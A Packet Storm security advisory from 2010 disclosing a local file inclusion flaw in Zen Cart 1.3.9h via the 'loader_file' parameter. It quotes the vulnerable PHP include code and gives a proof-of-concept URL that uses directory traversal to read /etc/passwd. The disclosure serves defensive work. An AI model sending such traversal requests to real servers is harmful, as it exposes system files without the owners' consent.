what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Zen Cart 1.3.9h Local File Inclusion

Zen Cart 1.3.9h Local File Inclusion
Posted Nov 4, 2010
Authored by Salvatore Fresta

Zen Cart version 1.3.9h suffers from local file inclusion and traversal vulnerabilities.

tags | exploit, local, vulnerability, file inclusion
SHA-256 | be52ee507546e6b2839c235d737a92c82421e00a0a3bcfcc0e109b12df942b9e

Zen Cart 1.3.9h Local File Inclusion

Change Mirror Download
Zen Cart 1.3.9h Local File Inclusion Vulnerability

Name Zen Cart
Vendor http://www.zen-cart.com
Versions Affected 1.3.9h

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-11-03

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX


I. ABOUT THE APPLICATION
________________________

Zen Cart truly is the art of e-commerce; free,
user-friendly, open source shopping cart software. The
ecommerce web site design program is being developed by a
group of like-minded shop owners, programmers, designers,
and consultants that think ecommerce web design could be
and should be done differently.


II. DESCRIPTION
_______________

A parameter is not properly sanitised before being used
by the include() PHP's function.


III. ANALYSIS
_____________

Summary:

A) Local File Inclusion


A) Local File Inclusion
_______________________

Input passed to the "loader_file" parameter in
includes/initsystem.php is not properly verified before
being used to include files. This can be exploited to
include arbitrary files from local resources via
directory traversal attacks.

Successful exploitation requires that register_globals is
set to On.

The following is the vulnerable code:

<?php

$base_dir = DIR_WS_INCLUDES . 'auto_loaders/';
if (file_exists(DIR_WS_INCLUDES . 'auto_loaders/overrides/' . $loader_file)) {
$base_dir = DIR_WS_INCLUDES . 'auto_loaders/overrides/';
}

include($base_dir . $loader_file);


IV. SAMPLE CODE
_______________

A) Local File Inclusion

http://site/path/includes/initsystem.php?loader_file=../../../../../../../../etc/passwd


V. FIX
______

No fix.
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close